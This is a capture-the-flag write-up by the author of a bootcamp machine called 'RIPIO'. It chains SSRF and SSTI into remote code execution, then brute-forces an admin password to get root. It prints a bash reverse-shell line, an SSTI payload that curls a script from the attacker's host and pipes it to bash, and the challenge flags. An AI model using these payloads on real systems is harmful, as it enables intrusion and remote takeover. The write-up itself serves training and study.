This was a cybersecurity bootcamp which also had a CTF running by the end of the bootcamp. I was among the ctf-coordinators, I created 2 challenges for this CTF. One was a mobile reverse engineering challenge and another was a machine.

I'll be explaining how the machine was solved till getting root access.

RIPIO [USER]

As the description states, Our task is to verify if it's safe to launch. Means we need to find vulnerabilities around this webapp before it goes live. Unfortunately it had 0 solves

We have 3 ports open, with NMAP or rustscan you will find :

port 22
port 8080
port 5000

Visiting port 5000 on a browser :

The /login and /register endpoints are the only available endpoints on that port but nothing juicy from there. Taking alook at port 8080

Inspecting the source code, you shall find something interesting:

<form action="/" method="post">
        <div class="container">
            <input type="url" placeholder="" name="url"/>
            <!--A COMMENT TO REMOVE http://[home-ip]:[port]/data?name=tahaa-->
            <input type="submit" value="REQUEST"/>
        </div>
        <div class="output">
            <p class="response"> </p>
        </div>
</form>

[home-ip] probably means localhost, and from the input tag we can see that the input taken should be a url. let's try requesting something like google.com

So there is a possible SSRF vulnerability existing on this webapp hosted on port 8080. With a hint provided http://[home-ip]:[port]/data?name=tahaa we surely have to try to bruteforce the port. I will be using burpsuite for this:

I'll send the request to Intruder and start bruteforcing the ports

I did two bruteforcing at a time , one with a step of 1000 and another with a step of 1 , the port found is 3000.

Trying to send a request on port 8080 to see how the response comes:

We have a SSTI vulnerable to the internal web application, now road to RCE

I now host a malicious script which gives me reverse shell after it being executed on the target server with SSTI

bash -c "bash -i &>/dev/tcp/0.0.0.0/1234 <&1"

and then I set a listener on my hosting system and execute the payload:

http://localhost:3000/data?name={{ namespace.__init__.__globals__.os.popen('curl http://0.0.0.0:8080/s.sh|bash').read() }}

where 0.0.0.0 is your IP

And now we have user, the flag is in /home/tahaafarooq/user.txt

FLAG : flag{SSRF_TO_SSTI_1nt3rM3DIATE}

RIPIO [ROOT]

I first try checking for privileges that I can run as sudo with the command sudo -l

tahaafarooq@localhost:~$ sudo -l
[sudo] password for tahaafarooq:
Sorry, try again.

Unfortunately I do not know the password. Next I read the /etc/passwd file

uuidd:x:107:113::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:114::/nonexistent:/usr/sbin/nologin
usbmux:x:109:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
landscape:x:112:116::/var/lib/landscape:/usr/sbin/nologin
tahaafarooq:x:1000:1000::/home/tahaafarooq:/bin/bash
admin:x:1001:27::/home/admin:/bin/bash

Another user in the system at /home/admin:

tahaafarooq@localhost:~$ ls -l /home/
total 8
drwxr-x--- 2 admin       sudo        4096 Jul 12 12:56 admin
drwxr-x--- 9 tahaafarooq tahaafarooq 4096 Jul 19 09:06 tahaafarooq

The admin's password can be bruteforced with rockyou.txt where you can use hydra to perform bruteforcing , the password is 2025admin

Fortunately user admin can run any command as sudo:

admin@localhost:~$ sudo -l
Matching Defaults entries for admin on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User admin may run the following commands on localhost:
    (ALL : ALL) ALL

admin@localhost:~$ sudo su
root@localhost:/home/admin# cd ~
root@localhost:~# cat root.txt
flag{w43k_p@ssword_n0t_gOOD}

FLAG : flag{w43k_p@ssword_n0t_gOOD}

UNINTENDED ROOT

The unintended method of getting root directly is with bruteforcing the password of the user admin which is of course guessed as default user.

BRIEFING

This machine had 2 ways of gaining initial foot hold the first way is by exploiting SSRF + SSTI to get initial shell and from there discovering other users in the system and bruteforcing the password of the other user available in the system. And the second way was to directly guess the username as admin and bruteforce the password then directly get root privileges from the user admin